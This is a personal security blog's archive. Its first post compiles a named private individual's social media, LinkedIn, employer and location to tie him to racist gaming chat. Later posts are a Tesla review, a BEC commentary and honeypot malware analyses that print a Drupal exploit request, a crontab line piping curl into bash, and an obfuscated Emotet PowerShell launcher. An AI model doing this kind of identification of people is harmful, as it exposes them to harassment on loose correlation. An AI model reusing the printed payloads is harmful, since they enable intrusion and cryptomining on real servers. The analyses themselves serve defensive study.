Just for kicks, I made a simple investigation into this person via public databases like Google and other websites. The most interesting thing was that the nickname he used seemed to be a real name, not a typical handle like “deathwarriorbot.” Well, that piqued my interest, and it didn’t take long to find out who may have allegedly been behind the hate – read on, and I’ll tell you what I found.

It’s official that the internet has become a cesspool of carbon copy trolls. There are many ways hate speech spreads online, and it seems to be getting worse. Twitter users line up to target people, and then anonymously rip them to shreds for fun and good times. It’s a psychological warfare, and these seemingly anonymous trolls have flourished in an environment of little accountability. I know quite a bit about trolling, especially since I hacked from the early 90s until the mid-2000s; in fact, many of us trolls were hackers, information gatherers, and pranksters. We’d make phone calls to friends and other individuals, playing various jokes, some cruel, but nothing that could ruin a person’s life, but never use hate speech to attack others. Sites like Twitter have given just about everyone a “voice” and can be highly politicized at times, littered with pure hate and negativity. Remember the old saying “Opinions are like a**holes, everybody has one”? Well, it’s true, and while I support free speech, I don’t condone speech that is hateful or intolerant. Honestly, I don’t like to read any comments nowadays, given the climate of trolls who are hate mongers.

It seems with the rapid growth of the internet, many of these people don’t care about being anonymous, as long as they can broadcast their message. There’s plenty of coverage on the psychology of why they do this, and on how the internet makes them feel powerful. I know this firsthand, as I’ve seen more than one Twitter or YouTube that has little to no followers or hits – but they carry on as if they’re on a podium of power, albeit a tiny one. Does that stop these people from thinking that somebody is listening? No. I don’t know what they call the disorder of having a disproportionate belief about your perceived power online versus offline, but I bet it’s hard to pronounce.

For example, in the political realm, a person’s beliefs seem to unconsciously be a part of his or her identity. If you attack a political figure, it is perceived as if you are attacking them directly at the core of what they believe. Attackers become stereotypical gang members who can take down any target at will. They preach division, not inclusion, and I think most of the time we have no idea who they really are. And because there’s proof that Russia and other countries have been behind many efforts to sway U.S. public opinion, it’s obvious that they do not reflect who we are as Americans – if they are from the U.S. at all.

To quote a favorite author of mine, Alan Weiss, from his Balancing Act blogs, “The human condition is not necessarily one of polarization. While tribes and cultures have been fighting for land and resources and power for millennia, they have also been able to come together for mutual benefit. The right to disagree, debate, and demur is important, even vital. But the belief that you’re with us or against us, you’re friend or enemy, is absurd. Despite the fact we may agree on a hundred other issues, this one issue creates an impregnable divide? Like the starship Enterprise, the emotional “shields” descend and prevent rational discourse and even logic from penetrating. You’re the “enemy,” so I have no intention of listening. Confirmation bias is viciously in play with highly emotional subjects: climate change, abortion, vivisection, politics, health care, welfare, education. That’s because passionate beliefs need to be shored up at all costs, and were reluctant to listen to evidence to the contrary with any objectivity at all. We need to stop searching solely for opinion and information that support our point of view (which is most of the activity on Facebook, by the way). As intelligent beings, we owe it to ourselves and our society to deliberately pursue varied points of view to draw our own rational conclusions.” I couldn’t have said it better, and I didn’t try.

So what can we do about trolls? Report them? Shame them publicly? Invite them to an MMA fight to ‘work things out’? I’d love that, but cowards typically won’t reveal themselves. It takes away their power when you can identify them, and for a troll, having the ‘docs’ on somebody is the ultimate weapon. It usually goes from politics to ad hominem (against the person), as you have to remember, this is about the ego defending one’s personal ‘identity.’. Nowadays, ignorant, intolerant college students shout at and shut down speakers with whom they disagree. What’s wrong with these students? Maybe we need accountability by lifting the mask of who’s behind the hate, and then it will be more apparent to trolls that their actions have consequences.

Now, on to the incident from last night… Note: there is explicit content in a racial slur, shown in a screenshot below.

Unmasking the Hate

Disclaimer: The information provided is as-is, and we do not condone the harassment of any individual, or hate speech. We are not stating it is a fact that this person conducted these activities, only sharing screenshots of a correlation between the name on this game, and what was found on Google. We are not ‘attacking’ this person, merely following a logical investigative path to uncover information. We are not accusing them of a crime, or wrongdoing. Do not attempt to call, e-mail, tweet, or harass this person based on this information. The purpose of providing this information is to offer a perspective into a situation that I directly witnessed, and impacted me personally. I’ve only compiled information from Google searches and added the perspective of any typical internet user.

*** Update 11/7/2018 – Ran into Nathan again on his foul rascist tear in the game Battlefield.



Screenshot of a user ‘NthnKirsch2’ writing vulgarities over and over, an estimated 100 times throughout the game in Battlefield 4, shown below:


Wait, there’s a twitter @nthnkirsch2, what are the odds? Probably just a coincidence, I mean we can’t confirm this guy is the same person, right?


Support for politics correlates with another comment on Steve Bannon


Hmm, the account for his game below seems to have the same picture. But hey, maybe it’s just another coincidence. Oh wait, it could be that a family member uses the account. Maybe a bad little brother, I mean that would explain it, right?


It looks like somebody using Nathan’s account petitioned to have a ban removed, for guess what? None other than racial slurs. This happened back in 2014, so either his “little brother” (Nathan was 34 at the time) is back with a vengeance, trying to throw dirt on his name, or it’s a cover-up.


In the blog posting, there’s a reference linking the alias nthnkirsch1, a member of steam that says the user is from North Carolina. This is important because in the Linkedin below the primary education of the user is Duke University, located in North Carolina. There is another Nathan I found in NC, and he’s still in college not a 38-year-old male, like what is shown above.


Instagram account forms another nexus between nthnkirsch1 and nthnkirsch2.


It seems like this hateful user shares a bit of ‘gaming rage’ with his little brother (if he actually exists). Earlier this year was complaining about hacks, cheaters, and issues using the game. This is similar to the comments in the game of ‘nice hack’, seems to fit pretty well with the first image:


Found a comment here with hate speech by user Nthnkirsch2:


Here’s a facebook, which we assume is the same, Nathan. He’s living in PA, and self-employed.


A quick search on LinkedIn finds a one Nathan Kirsch, from PA. Unless there are two Nathan Kirsch’s in the same town in PA? He appears well educated from Duke (North Carolina) for a person spewing this kind of racism (little brother?), and is currently the CEO at Radon Be Gone primarily serving people in Colorado, Idaho, Montana, Nevada, and Wyoming.


Confirmed by other information available on the internet, simply by searching the name we found in the game, nothing more. If Nathan is the one perpetrating this hate, then he hasn’t done much to cover up his tracks.

Any comments from Nathan Kirsch or Radon Be Gone? I’d be happy to discuss, and post your thoughts on the issue. Please advise, as I’d like for myself (and my little family members) to play a game without being exposed to hate speech. Nathan, if this was you I hope it’s a lesson that not only should you be more careful about using your real name and maybe have a bit of compassion for people of color. Something hateful is inside of you, and it seems to have been festering for a while. Why do you attack other people? What makes you so angry? If it was Nathan’s little brother he’s been at this for years now based on what we found online. I think it might be time for him to create his own accounts, and stop using the good name of his big brother.

I’m wondering if can people like this can change – or become better by accepting a love for diversity? It’s hard to say, but I felt like using my voice here could shine a light on this issue, and show you that not all trolls are immature 12-year-old gamers who are not worth looking into. Some of these trolls and hate speech advocates appear to be well-educated CEOs, and they seem to have nothing better to do than spread hate – a clearly unsustainable way to live in the melting pot we call America.

Trolls just want to have fun, and unfortunately for them, that correlates strongly with sadism, psychopathy, and Machiavellianism. 


Tesla – Model 3 Test Drive and Winning Big

Tesla – Model 3 Test Drive and Winning Big

No Comments

In recent news, people who wouldn’t ordinarily care about cars are obsessing about the numbers of Tesla, a billion dollar corporation. They’re laying down strategies and pleading on Twitter with Elon Musk to see things another way. But will he? Should he?

Let me ask you something – when was the last time you spent more than your salary on a bet, like starting a business or perhaps an investment, where you directly contributed to the end goal? I think the vast majority of people would say that they have never done it and that they don’t know the first thing about managing themselves, never mind operating a company with 30k employees. Not only is it almost inconceivable from that perspective, it’s impossible to fully comprehend.

That’s why people with no money or experience in the auto industry can have a voice going play-by-play with Tesla on the internet. The news is promoting negative outlooks, and I think the advice is formulated for investors – not the long-term successes but the short-term payouts. All you have to do is read the news to drown in the numbers on last week’s growth. But who’s controlling the narrative, the investors? How about propaganda from the competition? Renowned Twitter experts can see that 3,750 + 1,250 (25% more) = 5,000, which is their calculated proof of the company’s future outlook. It’s simple, right? Let me try to break this down, at least from the tiny window we all look through while trying to figure out what’s going on inside of Tesla. Mind you, I’ve done little research, but I keep up with the barebones facts and Tesla’s statements, in general.

Tesla’s Fremont manufacturing plant was aiming to produce 2,500 cars per day. This was less than 90 days ago and under a different leadership. It looks to me like Elon is doing what most leaders can’t and won’t do – he’s getting out of the office chair and down on the production floor to see his goals come to fruition. It’s exciting and awe-inspiring. I’d be honored to work there right alongside him in that battle.

The problem with these news reports is that they’re from the perspective of contributors who are hung-up in their own concerns (When can I leave?? 5 pm? Ugh!), and have limited visibility into the big picture. I’m sure the guy in the paint shop knows a ton about what’s going on, and I trust his casual observations from the floor without any question or hesitation. Wait, isn’t he supposed to be busy painting? The Fremont location alone has increased by 4,000 employees since June of 2016. Most of the haters Tesla talks about are either:

  1. Betting on the losses,
  2. Working with the competition, or
  3. Not qualified or informed enough to make an assessment.

Or maybe I’m just optimistic. I know what it’s like to work hard when everybody around you is doubtful, cynical, and spreading the worst outlook possible.

The Model 3 isn’t a myth. It’s a reality, and I know so because I drove a privately owned one recently for 3-4 days (VIN #9257). I’ve owned a variety of vehicles including Infiniti, Chrysler, Pontiac, Lincoln, Ford, and several others. In the last few years, I’ve rented at least 100 cars including Audi, BMW, Fiat, Mercedes, Lexus, Cadillac, Volkswagen, Subaru, Dodge, and the list goes on. Generally, the vehicles would have cost anywhere from $30k-$70k. I used these during my travels and would casually leverage a significant discount (50%) that I have with one company that’s local to my area. I’m not an expert on cars, but I have driven many of them, especially recently, so I know how frustrating all the quirks can be every time I change models and drive a different car around for two-and-a-half years. I’ve been frustrated by the unknown and puzzled by features, even where to pop the gas tank. How about Bluetooth issues? Ever reboot your phone or pair it five times to hear just five minutes of music? I’ve had dead batteries, overheating engines, and cars from hell that wouldn’t drive straight. And the majority of them were new cars with 0-20k miles!

The Model 3 was smooth on user experience, had tons of torque, and generally was fun to drive, unlike many other small, cramped, uncomfortable cars. I took several trips from Providence to Boston and back, only needing to recharge one time, and I started the trips with 20% battery. The technology was great and offered one of the most intuitive NAV experiences I’ve had to date. The car was just online, not tethering or using my phone as a hotspot. Tesla knows that small things make a difference, and the way the OS was set up is very intuitive. Overall, this car is reliable, and I’d be happy to own it after some time passes with the first generations. I think the key is just jumping in one and driving it on your terms. I highly recommend for that, and then, only then, should you render an opinion. You could read about them for days and look at every picture of them on the internet. Just get in one and get going. They rock!

Whether you bet for or against Tesla, they are still a winner. The company is about disruption and pushing the limits, done in the spirit of being up against impossible odds. The story is just as exciting to me without having to know or consider thinking about how it will end.

Also see: The War on Tesla, Musk, and the Fight for the Future



Long Range Battery (310mi.) (500km)

Premium Upgrades (full glass roof, heated seats, etc.)

0-60mph in 5.1 seconds

Enhanced Autopilot features: Lane Change Autosteer Side Collision Warning Summon (coming soon) Automatic Parking Emergency Braking



New Blog Design – Coming in July

New Blog Design – Coming in July

Finishing up the final code for my 2018 redesign. My desk is getting a facelift, and there will be a fully responsive mobile site. I’ve been patching all the leaks and covering up code issues with various plug-ins, CDNs, and enhancements for far too long. I need to focus on device compatibility, and most importantly the readability of the blog. Fonts, colors, the background should be adjusted to be easier on the eyes. I hope you enjoy it, and I’ll work to take more time to write useful content. I’m also working with an editor to proofread and organize my content better.

Note: I’ve actually got a bamboo top Jarvis Sit-Stand, Back App Chair, Dual Monitor Arm, 2x Dell S2318H, Contour Unimouse, RollerMouse Red, Logitech Z623Google Pixel2, Dell XPS 8390, Dell Latitude E5480, VSL188NC desk lamp, and 2 layers of 4x cheapo interlocking floor squares.

Thanks for reading, and stay safe.


Operation WireWire – ACH Fraud Takedown

Operation WireWire – ACH Fraud Takedown

No Comments
“Operation WireWire—which also included the Department of Homeland Security, the Department of the Treasury, and the U.S. Postal Inspection Service—involved a six-month sweep that culminated in over two weeks of intensified law enforcement activity resulting in 74 arrests in the U.S. and overseas, including 42 in the U.S., 29 in Nigeria, and three in Canada, Mauritius, and Poland. The operation also resulted in the seizure of nearly $2.4 million and the disruption and recovery of approximately $14 million in fraudulent wire transfers.” (

Business Email Compromise (BEC) is one of the scams aimed at companies that conduct wire transfers and have suppliers abroad.  Corporate or publicly available email accounts of executives and high-level employees related to finance or involved with wire transfer payments are either spoofed or compromised, through keyloggers or phishing attacks, to make fraudulent transfers, resulting in hundreds of thousands of dollars in losses. (Trend Micro).

I’ve seen recent comments in the media about how this DOJ crackdown wouldn’t put a big dent in or even make much of an impact on BEC, given the breadth of fraud associated with this outfit. I’d imagine the analysts in these quotes are looking at aggregate totals from the mile-high perspective and not the close-up, full scale of the damage to small businesses in our country. Companies have gone out of business, and schools have been attacked by these perpetrators. Personally, I don’t agree with or support the position that it’s just another routine arrest and it should be glazed over like it was picking off a few credit card skimmers.

The economies of scale with traditional Credit Card Fraud vs. Business E-mail Compromise cannot be directly compared, given who they impact and the average losses. This issue has never been about mitigating an impact on consumers as the criminals have always been focused on attacking small to medium-sized businesses. Typically, it’s the commercial accounts that are vulnerable to this kind of wire transfer fraud, unlike consumer credit cards that have built-in fraud protection that uses randomly generated numbers and a Visa or MasterCard logo. In these cases, the wires are facilitated directly from the account number being compromised.

Criminals obviously have a lot more to gain from raiding the digital coffers of businesses that handle millions in revenue, given that the average consumer credit card limit hovers around a measly $8,000. The average per-incident loss for a successful BEC scam is around $130,000; in comparison, robbing a bank will rake in about $3,800. The losses for traditional credit card fraud reported per incidence are much lower. Take a look at “23 Frightening Credit Card Fraud Statistics,” and you’ll see that in 2014, the median loss was $300 and the average reported loss was $1,343. If you’d ask someone who was ‘crushed’ by these low numbers to compare them to high-volume fraud numbers, you’d see how it wouldn’t make a dent. The reality, however, is that many BEC scams can net over a million dollars from a single source, something that seems unfathomable to people who are still living in the world of old-fashioned credit card fraud. This isn’t like the time somebody bought a $100 pair of sneakers using my debit card.

Not sure if this is a problem yet? Just ask Google and Facebook, who were the victims of a 100 million dollar fraud perpetrated almost entirely by a single individual in Lithuania. There are Nigerian men who stole almost 4 million dollars in a short time. If you really want to know, ask Leoni AG, a company that lost 44 million dollars in a single scam just a few years back. Are these extreme examples of BEC? No, many of these scams exceed a million dollars in losses in just a single incident. I don’t need to know the exact figures to make the connection that attackers with minimal sophistication are pulling it off for piles of cash. BEC scammers were operating mostly with impunity before this crackdown effort by the DOJ. If not, how could the losses possibly add up to 3 billion dollars? DOJ has been able to lock up a few here and there, but nothing like the 71 people from this most recent sweep.

Any law enforcement action would be welcomed, as long as it protects companies from scams and sends this clear message to the criminals abroad: If your activity trends upwards, so will our efforts to capture you. Not to mention that the hands of justice are now orienting themselves on how to efficiently take down these networks, thereby opening the door for streamlined enforcement for this type of crime.

The DOJ is doing a good job, and I don’t see it as a “dog and pony show” to expose these scammers in front of the world. It’s about justice and showing people in other countries that the internet may seem like a free plane ticket to communicate overseas, but you can still get arrested where that connection lands, just like you could in an airport. You’ve got to get started sometime, and today works well for tomorrow’s potential victims.

I think people who work on the ground in Cyber Security know that this day is long overdue, and it’s to be celebrated, not shrugged off as a waste of time. I’d never call it a waste of time – who in my industry would?

So let’s not turn the war on BEC into the war on Credit Card Fraud. Great work out there, folks!

Recent News:

Washington Post – It’s time to stop laughing at Nigerian scammers — because they’re stealing billions of dollars

Boston Herald – Phishing theft of $93G at clean energy agency went unreported for months

Telstra – A silent cybercrime blitzkrieg as Aussie businesses robbed of millions

IC3 – 2017 Internet Crime Report featuring Business E-mail Compromise

SWIFT E-mail Leads To Evasive Gootkit

SWIFT E-mail Leads To Evasive Gootkit

No Comments


We follow the trail of another spam e-mail. It’s delivering a malware downloader that’s 0/63 on Virustotal, not unheard of these days. The e-mail had a PDF attachment SWIFT-MT103.pdf which itself was innocuous and simply displayed a fuzzy scan image, purportedly a SWIFT request that linked to a file hosted on

Tactics of the downloader/dropper:

Contains functionality for read data from the clipboard
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Detected TCP or UDP traffic on non-standard ports
Sample file is different than original file name gathered from version info
Internet Provider seen in connection with other malware
Icon mismatch, PE includes an icon from a different legit application
Reads the hosts file

…and many other warning signs shown by the software in deeper debugging in included in the report.

Received: from (
(envelope-from <[email protected]>)

Reply-To: <[email protected]>
Date: Tue, 12 Jun 2018 01:42:52 +0000

A copy of the original e-mail received to a honeypot spam account:

Download the attached PDF, and examine it finding a link:

SWIFT MT103 PDF from E-mail 


Download the file from a link, and unzip the contents:


Analysis on the dropper downloaded from this link:

SWIFT MT103 Joe Sandbox Report

or directly from Joe Sandbox if you don’t trust my PDF.




Suppoie Crypto Hijack

Suppoie Crypto Hijack

We found an interesting hack using a Drupal 7.56 honeypot. The attacker used a specially crafted URL to pull down a jpeg image, which turned out to be a script. The script connects to a Monero mining pool, and starts mining crypto from the server automatically. Vulnerability used is via Curl in this version of Drupal.

Here’s all of the traffic from the attacker: - - [24/Apr/2018:01:34:08 +0000] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 403 36607 "-" "Ruby" - - [24/Apr/2018:02:00:41 +0000] "POST //?q=user/password&name[%23post_render][]=system&name[%23markup]=curl%20-s%20[%23type]=markup HTTP/1.1" 200 21915 "-" "Ruby" - - [24/Apr/2018:02:00:42 +0000] "POST /?q=file/ajax/name/%23value/form-RR2WlQ5bBKZlJcllzKJ16U3bf-IU_aIP8ALAzixqPZw HTTP/1.1" 200 1931 "-" "Ruby"


The file logo7.jpg pulled down from site is a script that runs the miner in /var/tmp/suppoie running as www-data on the device:

Created /var/tmp/suppoie (d9531f405d7231ac1e518e5bc3d1da8c) and config.json. The config.json file has embedded credentials to login to the mining pool under user



A crontab is created to keep the script going:

[email protected] /var/tmp # crontab -u www-data -l
* * * * * curl -s | bash -s


If you’re interested in doing analysis, I’ve added the code to download all of the files, password to the zip is infected.

Here’s an analysis courtesy of the JoeSandBox tool we often use to analyze Malware on this site.


Feodo Banking Trojan – Dropper Analysis

Feodo Banking Trojan – Dropper Analysis

No Comments

It all started with an e-mail from NYU: Received: from (MX5.NYU.EDU [])

"From: xxxx xxxx <[email protected]> 
Sent: Monday, April 2, 2018 9:36 AM
To: Infostruction
Subject: ACH Payment Advice
Good Afternoon,
Please double check the payment for April 02, I have attached the WIRE. Invoice 98914 was paid on 04.01.2018. 
I want to make sure we are both on the same page.
Thank you for your business!
xxxxx xxxx"


We analyzed the malicious document this website ( dropped:

SHA-256 f12642b8eb36637abaa85adbd559d056c36e2e013ca8f429236cd1fe0609c56a
File name WIRE-FORM-DA-280819104.doc
17 engines detected this file

File names included WIRE-FORM-DA-280819104.doc, and ACH-FORM-GMU-89664246207.doc. As you may already know, these will change randomly. The doc launched cmd.exe, which launched powershell with an obfuscated script. It drops C:\Users\Public\183480.exe, file connects to, IP (WEDOS-HOSTING CZ), (Online SAS),, and (OVH Hosting, Inc.). Some of these are failback addresses, if SSL is filtered, it will use the proxy port, then 443, and finally 4143 

Snort IDS: 2404328 ET CNC Feodo Tracker Reported CnC Server TCP group 15 ->


These identifiers are a trademark of the Emotet Banking Trojan, aka Feodo Banking Malware which is known for it’s evasiveness, reported by a deep dive done by Trend Micro late 2017.

According to a site Feodo Tracker:

“Feodo (also known as Cridex or Bugat) is a Trojan used to commit ebanking fraud and steal sensitive information from the victims computer, such as credit card details or credentials”.

Not surprisingly, 83 C&C Servers for this Trojan are hosted by OVH, a company we’ve recently had run-ins with for our own web security.

Here’s the gnarly cmd.exe launched, with the Powershell entirely encoded inside of it. Notice the evasion of “comspec” “runtime” and other programming code in the strings. Generally, it’s just trying to evade any pattern matching that’s not expecting upper, and lower case. Both are supported, but one variation may break out of the regex, and not be detected.

Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' KILQtKwM EUtzhvFBAwAuznswikbwwPVaP kliPXChmV & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %PwdzSKirbBZnwpN%=RMcNzPtWSjXm&&set %TNPmzoqfKBJtPf%=p&&set %HAhQIKrGiYZZI%=o^w&&set %HIiAtXXuPowqDzz%=pYBbmzjRJlGAD&&set %iSmITuLLKO%=!%TNPmzoqfKBJtPf%!&&set %GilnvkTTZuYRTVd%=mKzPDjtfw&&set %OsRDrSjYFtE%=e^r&&set %VzCrYnrSpDY%=!%HAhQIKrGiYZZI%!&&set %bZTWFfOzSAOv%=s&&set %AJbRqHRXqJJNCIP%=WQicJTbDDXb&&set %obHkNaO%=he&&set %DvIsqYMIjvnM%=ll&&!%iSmITuLLKO%!!%VzCrYnrSpDY%!!%OsRDrSjYFtE%!!%bZTWFfOzSAOv%!!%obHkNaO%!!%DvIsqYMIjvnM%! '([ruNtIMe.iNTEroPSeRViCes.mARsHaL]::([RuNTIme.intERoPsERViCeS.maRsHAl].GeTMeMbERs()[1].namE).InvOke( [rUnTIme.INTeropSErvIcEs.mArsHAL]::SeCuREstrINGtOglobAlallOCANsi( 



In some cases, it created this file, possibly to look innocuous:

The file C:\Users\XXXX\AppData\Local\Temp\TCD7340.tmp\Text Sidebar (Annual Report Red and Black design).docx. The file is not signed. The file was created by the script C:\Users\XXXX\Downloads\ACH-FORM-GMU-89664246207.doc after it established a TCP/80 connection to (, located in Louisville CO, United States)


Here’s a full breakdown, courtesy of JoeSandBox




OVH Hosting – Web Security Headache

OVH Hosting – Web Security Headache

** Update – 7/10/2018 – The relentless connections have never stopped, not even for a moment. We’ve seen over 398k connections from these hosts, and they don’t realize its the same blog page over and over, how intelligent! I’ve updated OVH via an abuse ticket over 50 times with totals, and summaries. They have never responded to my inquiries. I’ve never seen action taken on an abuse ticket out of at least 5 opened on various malware, phishing, and other attacks out on the internet.

** Update – 4/6/2018 – We’ve received 125,027 connections from this provider since the blog was posted. A block by ARIN name helps us cover more space, so OVH Hosting, Inc, and OVH SAS are completely blocked from our websites.

Why do Canadians love the Infostruction blog so much? This is a question I set out to answer after looking at our Web Application Firewall (WAF) logs over the past 48-hours, and beyond. I’ve got 60k connections from 39 different IPs that belong to OVH Hosting Inc, all hailing from Canada. I let them know about this issue back when it started and blocked all of the networks owned by this company. Since then, it’s been a constant flood of connections from OVH, and no response from the security/abuse team. I don’t expect one, so I’m writing here to warn you, if you see a large number of connections, we recommend blocking the IPs below at a minimum. The real problem comes with the volume and the fact that they are relentless, never stopping to rest. These connections come 24x7x365 and look like some sort of crawler, or scraper. The issue is they do not present a legitimate user-agent for that kind of bot, and so we have no idea why they are accessing all of the content repeatedly, for days on end.

OVH Hosting, please end this relentless assault on our web server. None of it is getting anywhere, and the global CDN/WAF is blocking every connection from these hosts, so they never reach the website’s real systems. It’s just blowing all of the data off my log for other connections I should be looking at instead. Stop wasting my time, and attack something else. You’ve got the idea for inbound attacks, now start protecting the internet FROM your clients, not just your clients from the internet.

Organization: OVH Hosting Inc. (aka OVH SAS)
Geolocation: Canada
Connections: 15,050 (48hr)

Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0

IP Addresses: